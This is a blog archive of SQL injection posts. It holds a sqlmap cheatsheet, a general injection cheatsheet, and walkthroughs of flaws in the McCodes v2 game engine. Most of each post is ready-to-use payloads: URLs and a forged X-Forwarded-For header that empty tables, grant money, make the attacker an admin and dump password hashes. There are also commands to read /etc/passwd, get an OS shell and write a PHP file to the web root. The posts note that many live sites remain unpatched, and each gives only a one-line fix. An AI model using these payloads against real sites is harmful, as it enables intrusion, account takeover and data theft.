Category Archives: SQL Injection

My sqlmap cheatsheet

Check for injection + get DB / server info
POST: sqlmap.exe -u “http://site.com/authenticate.php” –method “POST” –data “username=admin&password=admin&submit=Submit”

GET: sqlmap.py -u “http://site.com/authenticate.php?username=admin&password=admin&submit=Submit” –method “GET”

get DB names
sqlmap.exe -u “http://site.com/authenticate.php” –method “POST” –data “username=admin&password=admin&submit=Submit” –dbs

get sql username
sqlmap.exe -u “http://site.com/authenticate.php” –method “POST” –data “username=admin&password=admin&submit=Submit” –current-user

get tables in specified DB
sqlmap.exe -u “http://site.com/authenticate.php” –method “POST” –data “username=admin&password=admin&submit=Submit” –tables -D social_mccodes

dump a table from specified db
sqlmap.exe -u “http://site.com/authenticate.php” –method “POST” –data “username=admin&password=admin&submit=Submit” -D social_mccodes -T users –dump

Other Info
–threads 10 (default threads is 1, this greatly speeds it up)
–os-shell (get a shell)
–read-file=/etc/passwd (read a file’s contents)
–forms (Parse and test forms on target url)
–wizard (Simple wizard interface for beginner users)
-v 3 (Show payloads)
–tor (use default tor port)

My SQL Injection Cheat Sheet

//Select a string without using quotes
SELECT CHAR(110,101,121,61,109,111,110)
SELECT 0x39393939392C6D6F6E65793D6D6F6E65792B35 (alias for UNHEX( ‘39393939392C6D6F6E65793D6D6F6E65792B35′ ))

//Map out fields
WHERE fieldname IS NOT NULL

//Map out tables
WHERE 1 = (SELECT COUNT(*) FROM tablename)

//read files (need ‘file’ privilege)
select load_file(“/etc/apache2/apache2.conf”) —

//If FILE privilege given, and a directory with write enabled
SELECT “” INTO OUTFILE “/var/www/html/temp/c.php”

McCodes SQL Injection – GET/POST Item Market

McCodes updates the Item Market in a “buy” action like so, without sanitizing the $_GET[‘ID’] variable:

$db->query(“DELETE FROM itemmarket WHERE imID={$_GET[‘ID’]}”);

It also updates the “gift1″ action in a similar method, though one page longer – it first accepts a variable as a GET, embeds in as a hidden field in a form, them submits it in a POST.

To Inject:
There’s not too much we can do with this query as there are several ‘checkpoints’ it must pass (such as there being a valid item for sale that has been selected with our ID as input, the user having enough money for that item, etc.) So… let’s just empty the items table and keep it simple.

Example value:
Clears item market: itemmarket.php?action=buy&ID=0 or imID>0–
Clears item market: itemmarket.php?action=gift1&ID=0 or imID>0– (just click Submit)

To fix:
Sanitize the variable.

$_GET[‘ID’] = abs((int) $_GET[‘ID’]);

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
SQL Injection can result from ANY user input. This includes GET requests, POST requests, Cookies, and Headers, to name a few. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes SQL Injection – GET Crystal Market Part 2

McCodes updates the Crystal Market in a “buy” action like so, without sanitizing the $_GET[‘ID’] variable:

$q=$db->query(“SELECT * FROM crystalmarket cm WHERE cmID={$_GET[‘ID’]}”);
$r=$db->fetch_row($q);

$db->query(“UPDATE users SET crystals=crystals+{$r[‘cmQTY’]} where userid=$userid”);

To Inject:
The crystalmarket table in the database looks like so:
`crystalmarket` (
`cmID` int(11),
`cmQTY` int(11),
`cmADDER` int(11),
`cmPRICE` int(11),
) ;
Moreover, the value selected from crystalmarket is then updated within the user table. Unfortunately, we cannot pass a string because McCodes has addslashes enabled on all $_GET and $_POST… or can we?
We can, using the CHAR command.
SELECT CHAR(57,57,57,57,57,44,109,111,110,101,121,61,109,111,110,101,121,43,53) outputs:
99999,money=money+5

EDIT: Other options that also select the same string:
SELECT UNHEX( ‘39393939392C6D6F6E65793D6D6F6E65792B35′ )
SELECT 0x39393939392C6D6F6E65793D6D6F6E65792B35

Example values:

Adds $5 to your account:
cmarket.php?action=remove&ID=2 union all select 1,CHAR(57,57,57,57,57,44,109,111,110,101,121,61,109,111,110,101,121,43,53),0,0 —

Makes you an admin:
cmarket.php?action=remove&ID=2 union all select 1,CHAR(57,57,57,57,57,44,117,115,101,114,95,108,101,118,101,108,61,50),0,0 —

To fix:
Sanitize the variable.

$_GET[‘ID’] = abs((int) $_GET[‘ID’]);

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
SQL Injection can result from ANY user input. This includes GET requests, POST requests, Cookies, and Headers, to name a few. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes SQL Injection – GET Forums

McCodes default forums have a thread ID that is passed via GET when a reply is posted – and it’s not sanitized.

$q=$db->query(“SELECT * FROM forum_topics WHERE ft_id={$_GET[‘reply’]}”);
$topic=$db->fetch_row($q);
$q2=$db->query(“SELECT * FROM forum_forums WHERE ff_id={$topic[‘ft_forum_id’]}”);

To Inject:
First we put a nonsense ID that returns 0 rows. Then we do a union with a select statement of our own choosing. However… union requires the same number of columns in the two tables being put into union. No problem though! We just select one column repeatedly until we get the correct number of columns. As shown in the example below, even though you are only selecting one distinct column, you are selecting four columns total.
Select login_name,login_name,login_name,login_name FROM users where userid = 1

Example values:

//shows login name of userid=1
forums.php?reply=0 union all select login_name,login_name,login_name,
login_name,login_name,login_name,login_name,login_name,login_name,
login_name,login_name,login_name,login_name from users where userid=1

//shows md5 encoded password of userid=1
forums.php?reply=0 union all select userpass,userpass,userpass,userpass,userpass,
userpass,userpass,userpass,userpass,userpass,userpass,userpass,
userpass from users where userid=1

To fix:
Sanitize the variable.

$_GET[‘reply’] = abs((int) $_GET[‘reply’]);

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
SQL Injection can result from ANY user input. This includes GET requests, POST requests, Cookies, and Headers, to name a few. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes SQL Injection – GET Crystal Market Part 1

McCodes updates the Crystal Market in a “buy” action like so, without sanitizing the $_GET[‘ID’] variable:

$q=$db->query(“SELECT * FROM crystalmarket cm WHERE cmID={$_GET[‘ID’]}”);

To Inject:
The crystalmarket table in the database looks like so:
`crystalmarket` (
`cmID` int(11),
`cmQTY` int(11),
`cmADDER` int(11),
`cmPRICE` int(11),
) ;
So let’s put in a nonsense value that returns 0 rows, following by a union with a select statement that will select the values we want. The cmID doesn’t matter, the cmQTY we presumably want a lot of, cmADDER can be anyone (but to avoid suspicion one can put an ID number that doesn’t exist like 0 or negative), and cmPRICE we want to be 0 (so it doesn’t cost us anything).

Example value:
cmarket.php?action=buy&ID=2 union all select 1,99999999,0,0
cmarket.php?action=remove&ID=2 union all select 1,99999999,0,0 —

To fix:
Sanitize the variable.

$_GET[‘ID’] = abs((int) $_GET[‘ID’]);

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
SQL Injection can result from ANY user input. This includes GET requests, POST requests, Cookies, and Headers, to name a few. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes SQL Injection – IP Header

McCodes gets an IP Address like so:

$IP = ($_SERVER[‘HTTP_X_FORWARDED_FOR’])
? $_SERVER[‘HTTP_X_FORWARDED_FOR’]
: $_SERVER[‘REMOTE_ADDR’];

And then immediately uses it in a SQL Query without sanitizing the $IP.

$db->query(“UPDATE users SET lastip_login=’$IP’,last_login=unix_timestamp() WHERE userid={$mem[‘userid’]}”);

To Inject:
Download the Modify Headers add-on for Firefox. Change the X-Forwarded-For header value to something of your choosing.

Example value:
1′, user_level=’2′,money=1337, username=’bob

To fix:
Either sanitize the $IP variable, or change it to a server input (instead of client input).

$IP = $_SERVER[‘REMOTE_ADDR’];

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
SQL Injection can result from ANY user input. This includes GET requests, POST requests, Cookies, and Headers, to name a few. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

SQL Injection

Firefox Add-on: SQL Inject Me.

Automatically runs a plethora of tests, immediately displays results.